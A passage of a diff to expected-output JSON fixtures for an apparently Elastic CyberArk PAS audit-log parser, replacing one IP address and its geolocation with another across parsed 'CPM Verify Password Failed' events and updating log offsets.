+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.other.retriescount": "1",
         "cyberarkpas.audit.extra_details.username": "ELASTIC.local\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T15:04:11Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Verify Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 08:04:11</Timestamp>\n    <IsoTimestamp>2021-03-15T15:04:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615820651\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 08:04:11</Timestamp>\n    <IsoTimestamp>2021-03-15T15:04:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=1;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615820651\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 08:04:11",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "destination.user.name": "ELASTIC.local\\bart",
         "event.action": "cpm verify password failed",
         "event.category": [
@@ -298,17 +302,17 @@
         "event.kind": "event",
         "event.module": "cyberarkpas",
         "event.outcome": "failure",
-        "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "event.severity": 7,
         "event.timezone": "-02:00",
         "event.type": [
             "error"
         ],
-        "file.path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 12652,
+        "log.offset": 12528,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -317,7 +321,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "ELASTIC.local\\bart",
@@ -336,42 +340,43 @@
     {
         "@timestamp": "2021-03-15T16:35:01.000Z",
         "cyberarkpas.audit.action": "CPM Verify Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
-        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
+        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615826099",
         "cyberarkpas.audit.ca_properties.last_task": "VerifyTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask",
         "cyberarkpas.audit.ca_properties.retries_count": "2",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC.local\\bart",
         "cyberarkpas.audit.desc": "CPM Verify Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.other.retriescount": "2",
         "cyberarkpas.audit.extra_details.username": "ELASTIC.local\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T16:35:01Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Verify Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 09:35:01</Timestamp>\n    <IsoTimestamp>2021-03-15T16:35:01Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"2\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615826099\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 09:35:01</Timestamp>\n    <IsoTimestamp>2021-03-15T16:35:01Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=2;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"2\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615826099\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 09:35:01",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "destination.user.name": "ELASTIC.local\\bart",
         "event.action": "cpm verify password failed",
         "event.category": [
@@ -382,17 +387,17 @@
         "event.kind": "event",
         "event.module": "cyberarkpas",
         "event.outcome": "failure",
-        "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "event.severity": 7,
         "event.timezone": "-02:00",
         "event.type": [
             "error"
         ],
-        "file.path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 16937,
+        "log.offset": 16769,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -401,7 +406,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "ELASTIC.local\\bart",
@@ -467,7 +472,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 21222,
+        "log.offset": 21010,
         "log.syslog.priority": "7",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -542,7 +547,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 25232,
+        "log.offset": 25020,
         "log.syslog.priority": "7",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -617,7 +622,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 29415,
+        "log.offset": 29203,
         "log.syslog.priority": "7",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -692,7 +697,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 33542,
+        "log.offset": 33330,
         "log.syslog.priority": "7",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -768,7 +773,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 37627,
+        "log.offset": 37415,
         "log.syslog.priority": "7",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -846,7 +851,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 41831,
+        "log.offset": 41619,
         "log.syslog.priority": "7",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -924,7 +929,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 46092,
+        "log.offset": 45880,
         "log.syslog.priority": "7",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -1002,7 +1007,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 50461,
+        "log.offset": 50249,
         "log.syslog.priority": "7",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
@@ -1028,42 +1033,43 @@
     {
         "@timestamp": "2021-03-15T18:05:16.000Z",
         "cyberarkpas.audit.action": "CPM Verify Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
-        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
+        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615831516",
         "cyberarkpas.audit.ca_properties.last_task": "VerifyTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask",
         "cyberarkpas.audit.ca_properties.retries_count": "3",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC.local\\bart",
         "cyberarkpas.audit.desc": "CPM Verify Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.other.retriescount": "3",
         "cyberarkpas.audit.extra_details.username": "ELASTIC.local\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T18:05:16Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Verify Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 11:05:16</Timestamp>\n    <IsoTimestamp>2021-03-15T18:05:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"3\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615831516\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 11:05:16</Timestamp>\n    <IsoTimestamp>2021-03-15T18:05:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=3;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"3\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615831516\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 11:05:16",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
